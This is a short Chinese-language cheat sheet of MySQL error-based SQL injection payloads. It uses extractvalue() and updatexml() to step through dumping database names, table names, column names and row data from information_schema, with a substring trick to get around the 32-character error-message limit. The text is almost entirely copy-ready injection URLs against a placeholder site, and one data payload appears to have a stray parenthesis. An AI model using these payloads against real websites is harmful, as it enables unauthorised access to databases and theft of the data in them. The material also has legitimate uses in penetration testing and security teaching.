MySQL报错注入

extractvalue()，最多显示32位

• 模版

  http://url/?id=1 and (extractvalue(1,concat(0x7e,([code]),0x7e)))--+
  

在[code]处插入语句

• 库名

  http://url/?id=1 and (extractvalue(1,concat(0x7e,(select group_concat(schema_name)+from+information_schema.schemata),0x7e)))--+
  

---

数据库名

因为限制了显示位数，所以未完全显示出所有数据库，使用截断，

http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(schema_name),32)+from+information_schema.schemata),0x7e)))--+

---

数据库名2

直到将所有数据库名全部显示，其他数据注入基本大致相同，如下。

• 表名

  http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(table_name),1{截断})+from+information_schema.tables+where+table_schema={库名的16进制}),0x7e)))--+
  

• 列名

  http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat(column_name),1{截断})+from+information_schema.columns+where+table_name={表名的16进制}),0x7e)))--+
  

• 数据

  http://url/?id=1 and (extractvalue(1,concat(0x7e,(select mid(group_concat({列})),1{截断})+from+库.表),0x7e)))--+
  

• 扩展
  updatexml()的操作与extractvalue()基本一致，语句如下：

  http://url/?id=1 and (updatexml(1,concat(0x7e,([code]),0x7e),1))